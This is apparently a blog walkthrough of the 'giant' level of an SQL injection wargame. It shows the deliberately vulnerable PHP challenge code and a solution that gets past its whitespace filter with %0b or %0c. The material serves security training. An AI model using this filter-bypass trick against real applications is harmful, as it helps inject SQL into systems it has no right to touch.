LOS Lv.14 giant
giant
1
2
3
4
5
6
7
8
9
10
11
12
13
14
query : select 1234 fromprob_giant where 1
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
Solution
1
2
3
4
5
입력값에 {공백, \n, \r, \t} 필터링.
쿼리가 현재 띄워쓰기를 해줘야 하는 상황. 즉 공백 우회.
?shit=%0b 또는 %0c
This post is licensed under CC BY 4.0 by the author.